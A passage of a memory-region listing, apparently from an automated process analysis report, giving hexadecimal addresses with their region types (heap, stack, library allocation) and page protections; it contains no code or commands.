7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
205B59AE000
|
heap
|
page read and write
|
||
19D927F000
|
stack
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
1C3076E0000
|
heap
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
1C3092B0000
|
trusted library allocation
|
page read and write
|
||
1D901628000
|
trusted library allocation
|
page read and write
|
||
1C307758000
|
heap
|
page read and write
|
||
1D972B3D000
|
heap
|
page read and write
|
||
205C7891000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
20145121000
|
trusted library allocation
|
page read and write
|
||
20143F20000
|
heap
|
page execute and read and write
|
||
205B59A8000
|
heap
|
page read and write
|
||
1D974605000
|
heap
|
page read and write
|
||
2B020EC0000
|
trusted library allocation
|
page read and write
|
||
205CFA16000
|
heap
|
page execute and read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page execute and read and write
|
||
2B023737000
|
trusted library allocation
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
1C307980000
|
heap
|
page readonly
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
2B020CFD000
|
heap
|
page read and write
|
||
17868040000
|
heap
|
page execute and read and write
|
||
1D9729D0000
|
heap
|
page read and write
|
||
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
19D98FB000
|
stack
|
page read and write
|
||
1C321BE0000
|
heap
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
2015C9E5000
|
heap
|
page read and write
|
||
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
205CFCB7000
|
heap
|
page read and write
|
||
1C321BD7000
|
heap
|
page read and write
|
||
1D91019A000
|
trusted library allocation
|
page read and write
|
||
178680A3000
|
heap
|
page read and write
|
||
7FF84904B000
|
trusted library allocation
|
page read and write
|
||
1784E140000
|
trusted library allocation
|
page read and write
|
||
72CA7FD000
|
stack
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
1D974BE1000
|
heap
|
page read and write
|
||
2015C980000
|
heap
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
1D972A50000
|
trusted library allocation
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
1C30A9FE000
|
trusted library allocation
|
page read and write
|
||
20145934000
|
trusted library allocation
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
1C3078E0000
|
heap
|
page read and write
|
||
1785FF2F000
|
trusted library allocation
|
page read and write
|
||
7FF84915C000
|
trusted library allocation
|
page read and write
|
||
1D972BD6000
|
heap
|
page read and write
|
||
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
1D974CCB000
|
heap
|
page read and write
|
||
2015CA16000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
2B03B04E000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
6C71E7A000
|
stack
|
page read and write
|
||
201540A3000
|
trusted library allocation
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
F3E41FE000
|
stack
|
page read and write
|
||
1784FEF6000
|
trusted library allocation
|
page read and write
|
||
7FF849172000
|
trusted library allocation
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
F3E40FF000
|
unkown
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
1D972AB5000
|
heap
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
2069CE20000
|
heap
|
page read and write
|
||
1D974C28000
|
heap
|
page read and write
|
||
20143FB4000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
1D974A88000
|
heap
|
page read and write
|
||
2069CFE0000
|
heap
|
page read and write
|
||
1C3091A6000
|
heap
|
page read and write
|
||
2B03B09C000
|
heap
|
page read and write
|
||
CE11E7E000
|
stack
|
page read and write
|
||
E06647A000
|
stack
|
page read and write
|
||
7FF848F9A000
|
trusted library allocation
|
page read and write
|
||
1784FFD0000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
205CFA10000
|
heap
|
page execute and read and write
|
||
CE11C7E000
|
stack
|
page read and write
|
||
7FF849158000
|
trusted library allocation
|
page read and write
|
||
2B03AE56000
|
heap
|
page read and write
|
||
1D974C5E000
|
heap
|
page read and write
|
||
2015C3EC000
|
heap
|
page read and write
|
||
1784E090000
|
heap
|
page read and write
|
||
197C80A000
|
stack
|
page read and write
|
||
1786833B000
|
heap
|
page read and write
|
||
20145125000
|
trusted library allocation
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
2B020C35000
|
heap
|
page read and write
|
||
1D97514A000
|
heap
|
page read and write
|
||
20145590000
|
trusted library allocation
|
page read and write
|
||
2B03B129000
|
heap
|
page read and write
|
||
6C71FFD000
|
stack
|
page read and write
|
||
197BCBE000
|
stack
|
page read and write
|
||
E0674CD000
|
stack
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
205C7A52000
|
trusted library allocation
|
page read and write
|
||
1C30AA7A000
|
trusted library allocation
|
page read and write
|
||
2B03B085000
|
heap
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
1D900BBA000
|
trusted library allocation
|
page read and write
|
||
20153FAA000
|
trusted library allocation
|
page read and write
|
||
205B59AA000
|
heap
|
page read and write
|
||
1C321C2C000
|
heap
|
page read and write
|
||
2015C330000
|
heap
|
page execute and read and write
|
||
7FF848E34000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
1784E135000
|
heap
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
6C72ECB000
|
stack
|
page read and write
|
||
1D901737000
|
trusted library allocation
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
72CAD7B000
|
stack
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
1784FED1000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
1785002A000
|
trusted library allocation
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
1C321BA6000
|
heap
|
page read and write
|
||
1D972B3B000
|
heap
|
page read and write
|
||
1D901B06000
|
trusted library allocation
|
page read and write
|
||
72CAA77000
|
stack
|
page read and write
|
||
1C30AAD8000
|
trusted library allocation
|
page read and write
|
||
2B020D20000
|
heap
|
page read and write
|
||
E065FDE000
|
stack
|
page read and write
|
||
1784DFD3000
|
heap
|
page read and write
|
||
205CFCC3000
|
heap
|
page read and write
|
||
1C321C06000
|
heap
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
205B59A6000
|
heap
|
page read and write
|
||
205B5C80000
|
heap
|
page read and write
|
||
72CA6FE000
|
stack
|
page read and write
|
||
1C3077A2000
|
heap
|
page read and write
|
||
1C3079D5000
|
heap
|
page read and write
|
||
2014223F000
|
heap
|
page read and write
|
||
197C78C000
|
stack
|
page read and write
|
||
2B024719000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
1C307910000
|
heap
|
page read and write
|
||
6C720F9000
|
stack
|
page read and write
|
||
2B024781000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
7FF849169000
|
trusted library allocation
|
page read and write
|
||
178682F0000
|
heap
|
page read and write
|
||
1D901856000
|
trusted library allocation
|
page read and write
|
||
1784FFD6000
|
trusted library allocation
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
205B5940000
|
heap
|
page read and write
|
||
1C321BFD000
|
heap
|
page read and write
|
||
2015C5EF000
|
heap
|
page read and write
|
||
1D974AB4000
|
heap
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
1C30A81D000
|
trusted library allocation
|
page read and write
|
||
2B022774000
|
heap
|
page read and write
|
||
2B020C44000
|
heap
|
page read and write
|
||
19D987E000
|
stack
|
page read and write
|
||
1C30AEBC000
|
trusted library allocation
|
page read and write
|
||
20153FB2000
|
trusted library allocation
|
page read and write
|
||
20145753000
|
trusted library allocation
|
page read and write
|
||
2015C97C000
|
heap
|
page read and write
|
||
2015C370000
|
heap
|
page execute and read and write
|
||
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
2B022760000
|
heap
|
page read and write
|
||
2B0238BA000
|
trusted library allocation
|
page read and write
|
||
1C30A63D000
|
trusted library allocation
|
page read and write
|
||
2B03A950000
|
heap
|
page read and write
|
||
1D97460B000
|
heap
|
page read and write
|
||
2B020E20000
|
heap
|
page read and write
|
||
2B022765000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
1D972BB4000
|
heap
|
page read and write
|
||
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
CE12C8F000
|
stack
|
page read and write
|
||
2B0238D0000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
205CFCBA000
|
heap
|
page read and write
|
||
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
7FF849164000
|
trusted library allocation
|
page read and write
|
||
197BAB8000
|
stack
|
page read and write
|
||
205B5910000
|
heap
|
page read and write
|
||
201455C3000
|
trusted library allocation
|
page read and write
|
||
7FF849290000
|
trusted library allocation
|
page read and write
|
||
2B03AFE7000
|
heap
|
page read and write
|
||
205B5C10000
|
trusted library allocation
|
page read and write
|
||
178680C7000
|
heap
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
2B020C25000
|
heap
|
page read and write
|
||
205B59F3000
|
heap
|
page read and write
|
||
1C30A9DD000
|
trusted library allocation
|
page read and write
|
||
1C32181A000
|
heap
|
page read and write
|
||
7DF48D830000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
19D947E000
|
stack
|
page read and write
|
||
19D92FD000
|
stack
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
1784E165000
|
heap
|
page read and write
|
||
1D974586000
|
heap
|
page execute and read and write
|
||
1D974DCE000
|
heap
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
CE120B9000
|
stack
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
1D9019CC000
|
trusted library allocation
|
page read and write
|
||
7FF848E3C000
|
trusted library allocation
|
page execute and read and write
|
||
1C30AA14000
|
trusted library allocation
|
page read and write
|
||
6C721FA000
|
stack
|
page read and write
|
||
2B032C57000
|
trusted library allocation
|
page read and write
|
||
205B5CAC000
|
heap
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
1C309280000
|
trusted library allocation
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
201453A4000
|
trusted library allocation
|
page read and write
|
||
2B022690000
|
trusted library allocation
|
page read and write
|
||
1D901705000
|
trusted library allocation
|
page read and write
|
||
2015C970000
|
heap
|
page read and write
|
||
1C30AA46000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
7FF8491B0000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
20142435000
|
heap
|
page read and write
|
||
72CAB7D000
|
stack
|
page read and write
|
||
201421B5000
|
heap
|
page read and write
|
||
201421C2000
|
heap
|
page read and write
|
||
1D974C62000
|
heap
|
page read and write
|
||
2B023B80000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
1784E167000
|
heap
|
page read and write
|
||
20143BF0000
|
trusted library allocation
|
page read and write
|
||
20143C6B000
|
heap
|
page read and write
|
||
1C321C54000
|
heap
|
page read and write
|
||
2B03AF43000
|
heap
|
page read and write
|
||
7DF4D0660000
|
trusted library allocation
|
page execute and read and write
|
||
2014512A000
|
trusted library allocation
|
page read and write
|
||
1784DFC3000
|
heap
|
page read and write
|
||
7FF8492A5000
|
trusted library allocation
|
page read and write
|
||
205B5C60000
|
heap
|
page execute and read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
1D910001000
|
trusted library allocation
|
page read and write
|
||
72CAAF9000
|
stack
|
page read and write
|
||
1786839B000
|
heap
|
page read and write
|
||
205CFA28000
|
heap
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
7FF8491E0000
|
trusted library allocation
|
page read and write
|
||
19D9577000
|
stack
|
page read and write
|
||
205B9423000
|
trusted library allocation
|
page read and write
|
||
2B03B006000
|
heap
|
page read and write
|
||
2B03AE0D000
|
heap
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
E0666F9000
|
stack
|
page read and write
|
||
7FF848FF7000
|
trusted library allocation
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
1D9100A9000
|
trusted library allocation
|
page read and write
|
||
20144BEA000
|
trusted library allocation
|
page read and write
|
||
1C30AA64000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
72CA393000
|
stack
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
2B03AF27000
|
heap
|
page execute and read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
1C321B7B000
|
heap
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
20153F9A000
|
trusted library allocation
|
page read and write
|
||
205CFC08000
|
heap
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
2069D023000
|
heap
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
1D972BB0000
|
heap
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
2069CF20000
|
heap
|
page read and write
|
||
1D974607000
|
heap
|
page read and write
|
||
2B03AE42000
|
heap
|
page read and write
|
||
6C72077000
|
stack
|
page read and write
|
||
2B03B51A000
|
heap
|
page read and write
|
||
1C30AE91000
|
trusted library allocation
|
page read and write
|
||
CE118F3000
|
stack
|
page read and write
|
||
2B0244F4000
|
trusted library allocation
|
page read and write
|
||
205B94AA000
|
trusted library allocation
|
page read and write
|
||
7FF8491B0000
|
trusted library allocation
|
page read and write
|
||
7FF8490F8000
|
trusted library allocation
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
CE122BB000
|
stack
|
page read and write
|
||
20144B63000
|
trusted library allocation
|
page read and write
|
||
2B020C2C000
|
heap
|
page read and write
|
||
7FF849152000
|
trusted library allocation
|
page read and write
|
||
19D977E000
|
stack
|
page read and write
|
||
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
1C30A665000
|
trusted library allocation
|
page read and write
|
||
1D9010B9000
|
trusted library allocation
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page read and write
|
||
1C307764000
|
heap
|
page read and write
|
||
20142190000
|
heap
|
page read and write
|
||
2015CA07000
|
heap
|
page read and write
|
||
1D9016FC000
|
trusted library allocation
|
page read and write
|
||
1D901723000
|
trusted library allocation
|
page read and write
|
||
2015C5D1000
|
heap
|
page read and write
|
||
7FF849118000
|
trusted library allocation
|
page read and write
|
||
E0664FE000
|
stack
|
page read and write
|
||
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
2B023A67000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
2B032951000
|
trusted library allocation
|
page read and write
|
||
2015C380000
|
heap
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
205B5960000
|
heap
|
page read and write
|
||
20143C68000
|
heap
|
page read and write
|
||
6C71F79000
|
stack
|
page read and write
|
||
E0668FE000
|
stack
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
2B0244B9000
|
trusted library allocation
|
page read and write
|
||
1C307990000
|
trusted library allocation
|
page read and write
|
||
178680A0000
|
heap
|
page read and write
|
||
1D9744A0000
|
trusted library allocation
|
page read and write
|
||
17850445000
|
trusted library allocation
|
page read and write
|
||
20153F40000
|
trusted library allocation
|
page read and write
|
||
2B02342F000
|
trusted library allocation
|
page read and write
|
||
1C30779E000
|
heap
|
page read and write
|
||
19D937E000
|
stack
|
page read and write
|
||
72CA97E000
|
stack
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
2B023B92000
|
trusted library allocation
|
page read and write
|
||
197BBBE000
|
stack
|
page read and write
|
||
1D9751AE000
|
heap
|
page read and write
|
||
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
7FF848FF4000
|
trusted library allocation
|
page read and write
|
||
1D900DE1000
|
trusted library allocation
|
page read and write
|
||
7FF849164000
|
trusted library allocation
|
page read and write
|
||
1C31953A000
|
trusted library allocation
|
page read and write
|
||
20142420000
|
trusted library allocation
|
page read and write
|
||
2B0226C0000
|
heap
|
page execute and read and write
|
||
7FF848E3B000
|
trusted library allocation
|
page execute and read and write
|
||
201421F8000
|
heap
|
page read and write
|
||
1C321EC4000
|
heap
|
page read and write
|
||
1C30AB4D000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
197B87A000
|
stack
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
17868317000
|
heap
|
page read and write
|
||
2015C5E3000
|
heap
|
page read and write
|
||
1C307710000
|
heap
|
page read and write
|
||
7FF848FF7000
|
trusted library allocation
|
page read and write
|
||
2015C661000
|
heap
|
page read and write
|
||
2014583E000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
2B0229D5000
|
trusted library allocation
|
page read and write
|
||
7FF849272000
|
trusted library allocation
|
page read and write
|
||
6C71D7E000
|
stack
|
page read and write
|
||
1785097E000
|
trusted library allocation
|
page read and write
|
||
201459A8000
|
trusted library allocation
|
page read and write
|
||
2B0329C0000
|
trusted library allocation
|
page read and write
|
||
19D8FAF000
|
stack
|
page read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
2015C63E000
|
heap
|
page read and write
|
||
1D90106A000
|
trusted library allocation
|
page read and write
|
||
201440EB000
|
trusted library allocation
|
page read and write
|
||
2014556C000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
1D97513B000
|
heap
|
page read and write
|
||
6C719CF000
|
stack
|
page read and write
|
||
1C309FA8000
|
trusted library allocation
|
page read and write
|
||
2B03AF67000
|
heap
|
page read and write
|
||
2B02343F000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
7FF848E96000
|
trusted library allocation
|
page read and write
|
||
1C3218EA000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
2015C480000
|
trusted library allocation
|
page read and write
|
||
1D901468000
|
trusted library allocation
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849179000
|
trusted library allocation
|
page read and write
|
||
2B03AF88000
|
heap
|
page read and write
|
||
2B0243F1000
|
trusted library allocation
|
page read and write
|
||
205CFA20000
|
heap
|
page read and write
|
||
1C32185B000
|
heap
|
page read and write
|
||
2B02377F000
|
trusted library allocation
|
page read and write
|
||
20142430000
|
heap
|
page read and write
|
||
201451D4000
|
trusted library allocation
|
page read and write
|
||
1D901766000
|
trusted library allocation
|
page read and write
|
||
20145087000
|
trusted library allocation
|
page read and write
|
||
2015C3DF000
|
heap
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page execute and read and write
|
||
1C309426000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
1784FD50000
|
trusted library allocation
|
page read and write
|
||
197C889000
|
stack
|
page read and write
|
||
20143C96000
|
heap
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
1D974D44000
|
heap
|
page read and write
|
||
CE119FE000
|
stack
|
page read and write
|
||
20143BE0000
|
heap
|
page readonly
|
||
205CF89B000
|
heap
|
page read and write
|
||
205B7DCE000
|
trusted library allocation
|
page read and write
|
||
205B5CA7000
|
heap
|
page read and write
|
||
2015C5F7000
|
heap
|
page read and write
|
||
1D974470000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
2B03B07F000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
1C3079D0000
|
heap
|
page read and write
|
||
2015C639000
|
heap
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
1D972A90000
|
trusted library allocation
|
page read and write
|
||
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
2015C6A3000
|
heap
|
page read and write
|
||
7DF4097E0000
|
trusted library allocation
|
page execute and read and write
|
||
1D974E30000
|
heap
|
page read and write
|
||
72CA67E000
|
unkown
|
page read and write
|
||
7FF84917A000
|
trusted library allocation
|
page read and write
|
||
205B59ED000
|
heap
|
page read and write
|
||
2B02379D000
|
trusted library allocation
|
page read and write
|
||
20142437000
|
heap
|
page read and write
|
||
1D975173000
|
heap
|
page read and write
|
||
2B020C20000
|
heap
|
page read and write
|
||
1784DF75000
|
heap
|
page read and write
|
||
2015C637000
|
heap
|
page read and write
|
||
1C3079D7000
|
heap
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
1D90165F000
|
trusted library allocation
|
page read and write
|
||
2069CFE5000
|
heap
|
page read and write
|
||
1C30AE50000
|
trusted library allocation
|
page read and write
|
||
17850596000
|
trusted library allocation
|
page read and write
|
||
7FF848E9C000
|
trusted library allocation
|
page execute and read and write
|
||
1C3218AC000
|
heap
|
page read and write
|
||
1784DFBB000
|
heap
|
page read and write
|
||
F3E3D4B000
|
stack
|
page read and write
|
||
1D91009A000
|
trusted library allocation
|
page read and write
|
||
7FF848FF4000
|
trusted library allocation
|
page read and write
|
||
2015C984000
|
heap
|
page read and write
|
||
19D8F2E000
|
unkown
|
page read and write
|
||
2014591B000
|
trusted library allocation
|
page read and write
|
||
2B032C3F000
|
trusted library allocation
|
page read and write
|
||
1D972B00000
|
heap
|
page read and write
|
||
E0667FA000
|
stack
|
page read and write
|
||
1785001D000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
1D90115C000
|
trusted library allocation
|
page read and write
|
||
1C30ABF5000
|
trusted library allocation
|
page read and write
|
||
7FF849144000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
2069CFE2000
|
heap
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
2B023A46000
|
trusted library allocation
|
page read and write
|
||
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
2B020E80000
|
trusted library section
|
page read and write
|
||
1784FEFD000
|
trusted library allocation
|
page read and write
|
||
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
1C3219C0000
|
heap
|
page execute and read and write
|
||
7FF849280000
|
trusted library allocation
|
page read and write
|
||
2B024854000
|
trusted library allocation
|
page read and write
|
||
7FF848FF7000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
7FF849188000
|
trusted library allocation
|
page read and write
|
||
2069D023000
|
heap
|
page read and write
|
||
1D9728D0000
|
heap
|
page read and write
|
||
72CB74E000
|
stack
|
page read and write
|
||
2015C376000
|
heap
|
page execute and read and write
|
||
1D9101E5000
|
trusted library allocation
|
page read and write
|
||
201423E0000
|
trusted library section
|
page read and write
|
||
1784E137000
|
heap
|
page read and write
|
||
20145558000
|
trusted library allocation
|
page read and write
|
||
1D972AF6000
|
heap
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
2015C692000
|
heap
|
page read and write
|
||
2B03ADA0000
|
heap
|
page read and write
|
||
1D90128C000
|
trusted library allocation
|
page read and write
|
||
20144951000
|
trusted library allocation
|
page read and write
|
||
2B03B280000
|
heap
|
page read and write
|
||
E06687F000
|
stack
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
197B7FE000
|
stack
|
page read and write
|
||
1C30AB1B000
|
trusted library allocation
|
page read and write
|
||
20145113000
|
trusted library allocation
|
page read and write
|
||
1D974C8A000
|
heap
|
page read and write
|
||
2014560D000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
2B03B122000
|
heap
|
page read and write
|
||
201459E2000
|
trusted library allocation
|
page read and write
|
||
1C30AE16000
|
trusted library allocation
|
page read and write
|
||
2069CFED000
|
heap
|
page read and write
|
||
1C30AECD000
|
trusted library allocation
|
page read and write
|
||
197BDBE000
|
stack
|
page read and write
|
||
1C30ABC1000
|
trusted library allocation
|
page read and write
|
||
1C3092F0000
|
heap
|
page read and write
|
||
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
2B023B14000
|
trusted library allocation
|
page read and write
|
||
1D974DA0000
|
heap
|
page read and write
|
||
7FF849292000
|
trusted library allocation
|
page read and write
|
||
2069D019000
|
heap
|
page read and write
|
||
2B020C64000
|
heap
|
page read and write
|
||
2014579E000
|
trusted library allocation
|
page read and write
|
||
1D901B18000
|
trusted library allocation
|
page read and write
|
||
2B022770000
|
heap
|
page read and write
|
||
7FF8491D0000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
20143DA0000
|
trusted library allocation
|
page read and write
|
||
2015C66F000
|
heap
|
page read and write
|
||
7FF849123000
|
trusted library allocation
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
1C319518000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
7FF8491FC000
|
trusted library allocation
|
page read and write
|
||
1D972AB0000
|
heap
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
2B020C90000
|
heap
|
page read and write
|
||
1C321B6F000
|
heap
|
page read and write
|
||
2B03ADC0000
|
heap
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
1D91006F000
|
trusted library allocation
|
page read and write
|
||
1C309184000
|
heap
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
2015C978000
|
heap
|
page read and write
|
||
2B03B026000
|
heap
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849280000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
1D901573000
|
trusted library allocation
|
page read and write
|
||
1784F910000
|
heap
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
2015C4C9000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
201423F0000
|
trusted library section
|
page read and write
|
||
1D974D8A000
|
heap
|
page read and write
|
||
2B022B77000
|
trusted library allocation
|
page read and write
|
||
201421FC000
|
heap
|
page read and write
|
||
1C3079C0000
|
heap
|
page read and write
|
||
1D974DD0000
|
trusted library allocation
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849210000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849169000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
6C71EFE000
|
stack
|
page read and write
|
||
1D972B13000
|
heap
|
page read and write
|
||
205CFA75000
|
